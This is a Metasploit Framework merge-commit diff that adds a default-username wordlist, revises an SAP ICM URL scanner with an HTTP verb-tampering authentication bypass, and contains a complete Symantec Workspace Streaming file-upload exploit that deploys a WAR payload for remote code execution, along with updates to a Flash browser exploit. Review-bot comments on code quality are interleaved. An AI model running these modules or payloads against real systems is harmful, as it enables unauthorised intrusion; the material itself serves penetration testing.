Merge branch 'master' of github.com:rapid7/metasploit-framework into feature/recog

bug/bundler_fix
HD Moore 2014-05-19 11:42:30 -05:00
commit ddc8a4f103
10 changed files with 4364 additions and 76 deletions




@ -0,0 +1,915 @@
admin
root
Administrator
sysadm
tech
operator
guest
security
debug
manager
service
!root
user
netman
super
diag
Cisco
Manager
DTA
apc
User
Admin
cablecom
adm
wradmin
netscreen
sa
setup
cmaker
enable
MICRO
login
write
monitor
netopia
op
adminview
sysadmin
echo
craft
maint
comcast
CSG
readonly
manuf
cusadmin
smc
sweex
disttech
su
poll
SYSDBA
anonymous
support
recovery
USERID
eng
administrator
NETWORK
JDE
Guest
rwa
USER
test
lp
ro
MAIL
ami
hsa
system
MGR
ADMINISTRATOR
FIELD
PBX
HELLO
hscroot
1502
superuser
netrangr
readwrite
piranha
wlse
l3
none
naadmin
public
NETOP
MANAGER
demo
D-Link
l2
rw
cgadmin
storwatch
vcr
OPERATOR
MDaemon
jagadmin
enquiry
at4400
davox
PFCUser
aaa
topicalt
admin2
1234
nms
client
sys
field
deskman
SYSADM
superadmin
pmd
GEN2
ADMN
Factory
PRODDTA
tellabs
spcl
dadmin
helpdesk
dhs3mt
install
adfexc
IntraSwitch
manage
superman
SPOOLMAN
ADVMAIL
vt100
PSEAdmin
patrol
teacher
PCUSER
Any
RSBCMON
cellit
inads
halt
locate
TMAR#HWMT8007079
rapport
xbox
device
NICONEX
acc
31994
bcim
websecadm
blue
topicnorm
supervisor
ccrusr
266344
telecom
GEN1
SSA
HTTP
mtch
bciim
browse
hydrasna
deskres
bbsd-client
replicator
intel
radware
intermec
mlusr
init
e250
Polycom
temp1
mac
3comcso
RMUser1
WP
NAU
rcust
mtcl
topicres
bcnas
adminuser
Root
cac_admin
mediator
Anonymous
kermit
volition
GlobalAdmin
LUCENT01
LUCENT02
adminstat
desknorm
IntraStack
e500
deskalt
cust
tiara
bcms
m1122
telco
xd
dhs3pms
VNC
customer
cisco
adminstrator
ftp_nmc
me
iclock
scmadmin
installer
webadmin
ftp_inst
DDIC
SYSTEM
draytek
EARLYWATCH
super.super
ftp_oper
corecess
weblogic
system/manager
End
d.e.b.u.g
target
MD110
tiger
adminttd
wlseuser
SAPCPIC
ftp_admi
default.password
7
2
ADMIN
itsadmin
PUBSUB
CTXSYS
ftp
bill
192.168.1.1
setpriv
GUEST
SAP*
t3admin
hello
CISCO15
1.79
mso
Telecom
qsysopr
APPS
Developer
mail
qsecofr
11111
Service
netadmin
any
db2fenc1
johnson
isp
demos
QSRV
MDSYS
vpasp
TEST
QSECOFR
1
informix
5
engmode
scout
qpgmr
ADSL
images
Gearguy
Demo
serial#
BACKUP
stratacom
6.x
mary
COMPANY
SYS
DSL
Jetform
eagle
ROUTER
ods
siteadmin
Alphanetworks
Admin1
janta
servlet
username
citel
Replicator
SYSMAN
master
SUPERUSER
cn=orcladmin
30
maintainer
BRIO_ADMIN
internal
CQSCHEMAUSER
DEV2000_DEMOS
FSFTASK1
checkfs
USER1
SQLDBA
HELP
toor
qsrvbas
SYSADMIN
EZsetup
BATCH
STRAT_USER
primenet
OEMREP
USER6
lynx
powerdown
$ALOC$
password
VOL-0215
tomcat
REP_MANAGER
WinCCConnect
ALLIN1
DIRMAINT
eqadmin
QSRVBAS
AQJAVA
LASERWRITER
PERFSTAT
apcuser
MBWATCH
system_admin
unix
OWNER
NETPRIV
VSEMAINT
DEMO
SYMPA
REP_OWNER
DCL
FAX
ARCHIVIST
VTAMUSER
VMTAPE
basisk
NetLinx
OutOfBox
NETMGR
DEFAULT
OAS_PUBLIC
read
AP
MTSSYS
SYSMAINT
AUDIOUSER
Joe
IDMS
$SRV
snake
ROOT
PRINTER
shutdown
satan
RDM470
trouble
fax
OP1
admin@example.com
HOST
ADLDEMO
QS_ADM
bin
OPER
oracle
jj
PO7
www
joe
MAINT
CMSBATCH
CCC
role1
DATAMOVE
MSHOME
ISPVM
crowd­-openid-­server
user_editor
sedacm
db2admin
Airaya
SYSDUMP1
IMEDIA
primos_cs
USER_TEMPLATE
pnadmin
lpadmin
VTAM
TRACESVR
POSTMASTER
MAILER
RSCSV2
QS_WS
circ
nobody
Tasman
DISCOVERER_ADMIN
VMASMON
LR-ISDN
TURBINE
GL
PO
PRINT
MODTEST
GATEWAY
PRIMARY
both
haasadm
pw
games
DOCSIS_APP
bbs
EMP
postmaster
SITEMINDER
vgnadmin
RJE
gonzo
NEWS
AQUSER
UTLBSTATU
netbotz
xmi_demo
ORACACHE
MCUser
prash
sync
PM
AP2SVP
ibm
ULTIMATE
SABRE
user_pricer
SUPERVISOR
EVENT
PORTAL30_SSO_PS
FSFADMIN
OO
WKSYS
OPERATNS
UVPIM_
OE
OCITEST
web
ESSEX
None
CTXDEMO
user_designer
QDBA
role
LRISDN
tele
WEBCAL01
rsadmin
OMWB_EMULATION
WINDOWS_PASSTHRU
MOREAU
fast
host
ORDPLUGINS
SYSWRM
savelogs
SDOS_ICSAP
DSSYS
MGWUSER
TDOS_ICSAP
ssp
EJSADMIN
INGRES
DS
estheralastruey
VCSRV
ssladmin
CLARK
OEMADM
restoreonly
quser
MILLER
trmcnfg
REPORT
user_author
dpn
tour
mountfsys
http
PROG
openfiler
RAID
STARTER
FAXUSER
DSA
daemon
mountsys
backuponly
IVPM1
USER3
OPENSPIRIT
prime
HPLASER
CSPUSER
qsvr
SYSCKP
Sysop
user_marketer
IMAGEUSER
bsxuser
MASTER
USER9
OLAPSYS
rje
ODM_MTR
QS_ES
lansweeperuser
DEMO3
Username
GPLD
uucp
DBSNMP
VMARCH
SWUSER
Operator
CHEY_ARCHSVR
roo
n.a
accounting
backuprestore
dni
WEBADM
iceman
guru
anon
USER8
PORTAL30_SSO_PUBLIC
postgres
WINSABRE
USERP
IVPM2
PORTAL30_SSO
ALLIN1MAIL
POST
TEMP
BATCH1
PROMAIL
SECDEMO
ARAdmin
sadmin
ORAREGSYS
VMASSYS
man
FROSTY
LASER
tutor
DISKCNT
default
SYSERR
WWW
VAX
PROCAL
FAXWORKS
LDAP_Anonymous
(any
setup/snmp
DSGATEWAY
AWARD_SW
CSMIG
umountfsys
VMS
bpel
viewuser
TDISK
politically
user_analyst
RSCS
COMPIERE
OSP22
guest1
FORSE
factory
bubba
QUSER
primeos
glftpd
RMAN
mountfs
DIRECT
firstsite
IPFSERV
TSUSER
BATCH2
snmp
WebAdmin
IBMUSER
SMART
voadmin
BC4J
core
OPERVAX
Bobo
WANGTEK
OWA
USER2
jasperadmin
VMBSYSAD
PVM
ctb_admin
 
DEMO4
qsrv
superdba
PORTAL30
XPRT
Crowd
18364
ilom-admin
rdc123
sysopr
tasman
blank
WEBREAD
ODM
11111111
AURORA$ORB$UNAUTHENTICATED
ADAMS
Craft
rfmngr
SYSTEST_CLIG
user_approver
ilom-operator
Nice-admin
answer
NETNONPRIV
nuucp
CIDS
VASTEST
redline
MBMANAGER
webmaster
APPLSYS
USER4
hqadmin
UOMNI_
VMUTIL
uucpadm
EXFSYS
4Dgifts
JMUSER
CIS
UNITY_
HLW
pwrchute
IDMSSE
NSA
TELEDEMO
recover
TRAVEL
lexar
viewer
LIBRARY
PO8
root@localhost
NAMES
secofr
PDMREMI
MGE
USER7
OWA_PUBLIC
questra
builtin
SFCNTRL
boss
PLEX
OLAPDBA
OLAPSVR
user_expert
Bhosda
gropher
TAHITI
NEWINGRES
VM3812
VIF_DEVELOPER
joeuser
IPC
HELPDESK
wlpisystem
TSAFVM
prtgadmin
UAMIS_
theman
CISINFO
mobile
QS_CB
CDEMORID
DEMO2
PORTAL30_PUBLIC
MDDEMO_CLERK
PHANTOM
ODS
BLAKE
TSDEV
PRODBM
dos
APL2PP
god1
CICSUSER
22222222
user_publisher
OSE$HTTP$ADMIN
def
SuperUser
QS_CBADM
SYSA
STUDENT
Draytek
SMDR
EREP
VSEMAN
fwadmin
MTS_USER
AQDEMO
private
IS_$hostname
HPSupport
ORASSO
CVIEW
SH
XXSESS_MGRYY
VMMAP
PORTAL30_DEMO
Ezsetup
QS_CS
CMSUSER
DEMO1
userNotUsed
ncadmin
TESTPILOT
fg_sysadmin
UETP
QS
DBI
JWARD
APPS_MRC
Moe
SENTINEL
Yak
PDP11
Flo
SLIDE
INFO
checkfsys
PRODCICS
MXAGENT
VMTLIBR
POWERCARTUSER
VMBACKUP
CPNUC
distrib
MIGRATE
CDEMOUCB
OLTSEP
sysbin
signa
autocad
WEBDB
ncrm
SAMPLE
HCPARK
ALLINONE
nm2user
SAVSYS
IIPS
PATROL
mailadmin
TMSADM
ESubscriber
software
god2
FSFTASK2
ORDSYS
gopher
PSFMAINT
EAdmin
12345
DECNET
OPERATIONS
$system
PANAMA
LIBRARIAN
fal
NETSERVER
POWERCHUTE
USER5
GPFD
QS_OS
REPADMIN
0
DEMO8
DEMO9
CDEMO82
umountsys
USER0
CDEMOCOR
SYSTEST
Rodopi
user_checker
qserv
AQ
SAPR3
VRR1
fastwire
admi
FINANCE
WinCCAdmin
ESTOREUSER
VIRUSER
LINK
APPLSYSPUB
overseer
checksys
umountfs
DBDCCICS
TOAD
ntpupdate
MDDEMO_MGR
billy-bob
DECMAIL
alien
nsroot
AdvWebadmin
dvstation
SERVICECONSUMER1
MMO2
NOC
WWWUSER
SAP
NEVIEW
ODSCOMMON
pixadmin
ripeop
PENG
netlink
L2LDEMO
OUTLN
12.x
scott
dbase
fam
Oper
RMAIL
FND
PRIV
SETUP
news
VSEIPO
ilon
PLSQL
politcally
18140815
APPUSER
CENTRA
LBACSYS
PDP8
SFCMI
lpadm
Test
bewan
DIP
mfd
MDDEMO
SWPRO
DES
Coco
GCS
rodopi
Scott
Admin5
ANDY
DESQUETOP
NETCON
JONES
author
MOESERV
PUBSUB1
CATALOG
SQLUSER
RE
REPORTS_USER
MFG
HR
VIDEOUSER
DBA
AUTOLOG1
AURORA$JIS$UTILITY$
wlcsystem
CPRM
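Review bot: Entry `crowd­-openid-­server` in this new wordlist appears to carry invisible soft-hyphen (U+00AD) characters around its hyphens, so as written it will never match the plain ASCII username it is meant to represent; it should be re-typed as `crowd-openid-server`. Two other entries look like data-hygiene slips worth a second look: the whitespace-only line after `ctb_admin`, which a consumer that does not strip lines will try as a literal single-space username, and `(any`, which reads like a truncated fragment rather than a real account name. If the blank entry is intended as an empty username, a comment or the existing `blank` entry would make that explicit.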


@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The
vulnerability exists in the DBVisitor.dll component, and can be abused through malicious
requests to the ChartThemeConfig web service. This module can be used to extract the site
and projects usernames and hashes.
and project usernames and hashes.
},
'References' =>
[


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@ -30,143 +29,160 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
OptPath.new('URLFILE', [true, "SAP ICM Paths File",
File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
})
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
if res.headers['Server']
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
File.open(url_file) do |f|
urls_to_check = check_urlprefixes
File.open(datastore['URLFILE']) do |f|
f.each_line do |line|
urls_to_check.push line
end
end
print_status("#{rhost}:#{rport} Beginning URL check")
@valid_urls = ''
urls_to_check.each do |url|
check_url(url.strip)
end
# check custom URLs
check_urlprefixes
else
print_error("#{rhost}:#{rport} No response received")
end
if @valid_urls.length > 0
l = store_loot(
'sap.icm.urls',
"text/plain",
datastore['RHOST'],
@valid_urls,
"icm_urls.txt", "SAP ICM Urls"
)
print_line
print_good("Stored urls as loot: #{l}") if l
end
end
def check_url(url)
full_url = write_url(url)
res = send_request_cgi({
'uri' => url,
'uri' => normalize_uri(url),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
})
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
if res.headers['Server']
unless @info.include?(res.headers['Server'])
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
case res.code
when 200
print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})")
@valid_urls << full_url << "\n"
when 403
print_status("#{full_url} - restricted (#{res.code})")
when 401
print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}")
@valid_urls << full_url << "\n"
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
when 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
vprint_status("#{full_url} - not found (#{res.code})")
when 400, 500
print_status("#{full_url} - produced a server error (#{res.code})")
when 301, 302
print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
@valid_urls << full_url << "\n"
when 307
print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
else
vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
print_error("#{full_url} - unhandled response code #{res.code}")
@valid_urls << full_url << "\n"
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)")
vprint_status("#{full_url} - not found (No Repsonse code Received)")
end
end
def write_url(path)
if datastore['SSL']
protocol = 'https://'
else
protocol = 'http://'
end
"#{protocol}#{rhost}:#{rport}#{path}"
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
full_url = write_url(url)
vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'uri' => normalize_uri(url),
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
})
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})")
if (res && res.code == 200)
print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
# "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS.
# This is how the message server finds out which URLs must be forwarded where.
# (SAP help) -> this disclose custom URLs that are also checked for authentication
def check_urlprefixes
# "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help)
# -> this disclose custom URLs that are also checked for authentication
urls = []
res = send_request_cgi({
'uri' => "/sap/public/icf_info/urlprefix",
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (res and res.code == 200)
})
if (res && res.code == 200)
res.body.each_line do |line|
if line =~ /PREFIX=/
url_enc = line.sub(/^PREFIX=/, '')
# Remove CASE and VHOST
url_enc = url_enc.sub(/&CASE=.*/, '')
url_dec = URI.unescape(url_enc).sub(/;/, '')
check_url(url_dec.strip)
urls << url_dec.strip
end
end
else
print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
end
urls
end
end
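Review bot: `@valid_urls = ''` is only assigned inside the `if res` branch of `run_host`, yet `if @valid_urls.length > 0` after the `else` branch runs unconditionally, so a host that returns no response raises NoMethodError on nil right after printing "No response received". Initialise it at the top of `run_host`, before `res = send_request_cgi(`, or guard with `if @valid_urls && !@valid_urls.empty?`. The same hunk ships a typo in the new message `No Repsonse code Received`, and the last `vprint_status` in `bypass_auth` still prefixes `#{rhost}:#{rport}` where every other message in that method was switched to `#{full_url}`. The enclosing class is opened in the section's first hunk.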


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
row.each { |val| @hashes << val.value.to_s }
end
print_good("#{ip} Found Users & Password Hashes:")
print_good("#{ip} - Found user and password hashes:")
end
credinfo = ""
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end


@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end


@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end


@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Symantec Workspace Streaming. The
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
as_agent.exe service, which allows for uploading arbitrary files under the server root.
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
to achieve remote code execution. This module has been tested successfully on Symantec
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
machine deployment, and also in the backend role in a multiple machine deployment.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-1649'],
['BID', '67189'],
['ZDI', '14-127'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 12 2014'))
register_options(
[
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
], self.class)
end
def send_xml_rpc_request(xml)
res = send_request_cgi(
{
'uri' => normalize_uri("/", "xmlrpc"),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => xml
})
res
end
def build_soap_get_file(file_path)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.getFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file_name = params.add_element("param")
value_file_name = param_file_name.add_element("value")
value_file_name.text = file_path
param_file_binary = params.add_element("param")
value_file_binary = param_file_binary.add_element("value")
type_file_binary = value_file_binary.add_element("boolean")
type_file_binary.text = "0"
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_put_file(file)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file = params.add_element("param")
value_file = param_file.add_element("value")
type_value_file = value_file.add_element("ex:serializable")
type_value_file.text = file
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_check_put
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
xml.root.add_element("params")
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def parse_method_response(xml)
doc = Document.new(xml)
file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
unless file.nil?
file = Rex::Text.decode_base64(file.text)
end
file
end
def get_file(path)
xml_call = build_soap_get_file(path)
file = nil
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
file = parse_method_response(res.body.to_s)
end
file
end
def put_file(file)
result = nil
xml_call = build_soap_put_file(file)
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
result = parse_method_response(res.body.to_s)
end
result
end
def upload_war(war_name, war, dst)
result = false
java_file = build_java_file_info("#{dst}#{war_name}", war)
java_file = Rex::Text.encode_base64(java_file)
res = put_file(java_file)
if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
result = true
end
result
end
def jboss_deploy_path
path = nil
leak = get_file("bin/CreateDatabaseSchema.cmd")
if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
path = $1
end
path
end
def check
check_result = Exploit::CheckCode::Safe
if jboss_deploy_path.nil?
xml = build_soap_check_put
res = send_xml_rpc_request(xml)
if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
check_result = Exploit::CheckCode::Detected
end
else
check_result = Exploit::CheckCode::Appears
end
check_result
end
def exploit
print_status("#{peer} - Leaking the jboss deployment directory...")
jboss_path =jboss_deploy_path
if jboss_path.nil?
fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
end
print_status("#{peer} - Building WAR payload...")
app_name = Rex::Text.rand_text_alpha(4 + rand(4))
war_name = "#{app_name}.war"
war = payload.encoded_war({ :app_name => app_name }).to_s
deploy_dir = "..#{jboss_path}"
print_status("#{peer} - Uploading WAR payload...")
res = upload_war(war_name, war, deploy_dir)
unless res
fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
end
register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET',
'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def ste_port
datastore['STE_PORT']
end
# com.appstream.cm.general.FileInfo serialized object
def build_java_file_info(file_name, contents)
stream = "\xac\xed" # stream magic
stream << "\x00\x05" # stream version
stream << "\x73" # new Object
stream << "\x72" # TC_CLASSDESC
stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
stream << "com.appstream.cm.general.FileInfo"
stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [6].pack("n") # number of fields in the class
stream << "Z" # boolean
stream << ["bLastPage".length].pack("n")
stream << "bLastPage"
stream << "J" # long
stream << ["lFileSize".length].pack("n")
stream << "lFileSize"
stream << "[" # array
stream << ["baContent".length].pack("n")
stream << "baContent"
stream << "\x74" # TC_STRING
stream << ["[B".length].pack("n")
stream << "[B" # field's type (byte array)
stream << "L" # Object
stream << ["dTimeStamp".length].pack("n")
stream << "dTimeStamp"
stream << "\x74" # TC_STRING
stream << ["Ljava/util/Date;".length].pack("n")
stream << "Ljava/util/Date;" #field's type (Date)
stream << "L" # Object
stream << ["sContent".length].pack("n")
stream << "sContent"
stream << "\x74" # TC_STRING
stream << ["Ljava/lang/String;".length].pack("n")
stream << "Ljava/lang/String;" #field's type (String)
stream << "L" # Object
stream << ["sFileName".length].pack("n")
stream << "sFileName"
stream << "\x71" # TC_REFERENCE
stream << [0x007e0003].pack("N") # handle
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
# Values
stream << [1].pack("c") # bLastPage
stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
stream << "\x75" # TC_ARRAY
stream << "\x72" # TC_CLASSDESC
stream << ["[B".length].pack("n")
stream << "[B" # byte array)
stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [0].pack("n") # number of fields in the class
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
stream << [contents.length].pack("N")
stream << contents # baContent
stream << "\x70" # TC_NULL # dTimeStamp
stream << "\x70" # TC_NULL # sContent
stream << "\x74" # TC_STRING
stream << [file_name.length].pack("n")
stream << file_name # sFileName
stream
end
end
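Review bot: `register_files_for_cleanup("../server/appstream/deploy/#{war_name}")` in `exploit` hardcodes the deploy directory, although the WAR itself is written to `deploy_dir`, which is derived from the value leaked by `jboss_deploy_path`; if the leaked path differs from the hardcoded one, FileDropper will not remove the uploaded file and the target is left modified. Use the same value for both, `register_files_for_cleanup("#{deploy_dir}#{war_name}")`. Minor style in the same method: `jboss_path =jboss_deploy_path` is missing the space after `=`. In `build_java_file_info` the length prefixes use `contents.length` and `file_name.length`; Java serialization counts bytes, so `bytesize` would be the safer choice if either string ever arrives with a non-binary encoding — presumably they are ASCII-8BIT today, so this is a hardening note rather than a visible bug.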


@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
Windows XP SP3, Windows 7 SP1 and Windows 8.
has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
# Disabled by default to allow sessions on Firefox, still useful when exploiting IE
#'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
},
'Targets' =>
@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
</object>
</body>
</html>
